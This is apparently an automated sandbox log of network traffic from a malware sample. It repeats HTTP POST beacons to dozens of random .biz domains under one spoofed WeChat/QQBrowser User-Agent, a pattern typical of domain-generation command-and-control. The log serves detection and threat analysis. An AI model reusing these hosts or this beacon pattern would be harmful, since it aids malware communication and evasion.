Source: global traffic	HTTP traffic detected: POST /nr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /uku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sbnab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dvarulpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /tfbvwglkixk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /noubyejh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cdrlubbsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qmfujjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dxlhs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rgkgvuyxljjatio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ki HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vhecjxbkixjuljyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cgkctkdxtvumt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /nmqrslobvguxfrkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /esgffqvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /eviqjrwjsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xyrpanl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /aoayitmlcu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ceercoregt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xgyulldvremqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jhppqdqsxkpre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xsnbcmvbhjayqro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /myrpsocdgnp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /pm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /jntykoegrmymca HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nwuwfpndyaon HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /tpnlrogxe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /gqjcfeax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fxyeanegauuypg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /itmauuakdv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cqrtypmijgihv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xcccv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /seopbnrlp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vuf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lqskha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /poufjqlcmnc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fwiohktfcqxxnbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /pdgkdbbj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /byhbnbikqcomemw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jubq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xcnnbrtqgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qoerrcmhybkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wnele HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lrxwrhp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xwfedwcvhvxkiha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mfixqgnsqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /frqpsrt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hljxfepxgpjush HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fiarjsoopiyhm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vwjckymhn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hij HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dpjyudy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hdokbthlu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xllckl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nfbd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /mr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ldxvcwjydqq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qlyttg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rbpibulhoasascdr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
